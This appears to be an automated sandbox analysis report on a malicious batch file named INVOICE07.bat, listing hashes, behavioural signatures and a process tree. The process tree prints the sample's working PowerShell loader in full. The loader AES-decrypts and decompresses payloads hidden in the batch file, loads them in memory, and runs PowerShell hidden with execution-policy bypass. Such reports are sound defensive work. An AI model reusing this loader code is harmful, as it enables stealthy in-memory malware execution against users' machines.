Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
04-06-2024 01:39
Static task
static1
Behavioral task
behavioral1
Sample
INVOICE07.bat
Resource
win7-20240215-en
4 signatures
150 seconds
General
-
Target
INVOICE07.bat
-
Size
540KB
-
MD5
1952a79579272db52a814baf57821f90
-
SHA1
3fcfb6c3d2c08e840d758e905c2f304ec39ca9f3
-
SHA256
e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1
-
SHA512
088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93
-
SSDEEP
12288:xToPjPt8r1cxIMTOQo5Xq4PpsXis9Jhqd8FJVqzT+53xH:xeWrOa4UaYpsXlJIdwSIZ
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2992 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 1776 wrote to memory of 2976 1776 cmd.exe 29 PID 1776 wrote to memory of 2976 1776 cmd.exe 29 PID 1776 wrote to memory of 2976 1776 cmd.exe 29 PID 1776 wrote to memory of 2988 1776 cmd.exe 30 PID 1776 wrote to memory of 2988 1776 cmd.exe 30 PID 1776 wrote to memory of 2988 1776 cmd.exe 30 PID 1776 wrote to memory of 2992 1776 cmd.exe 31 PID 1776 wrote to memory of 2992 1776 cmd.exe 31 PID 1776 wrote to memory of 2992 1776 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:2976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992
-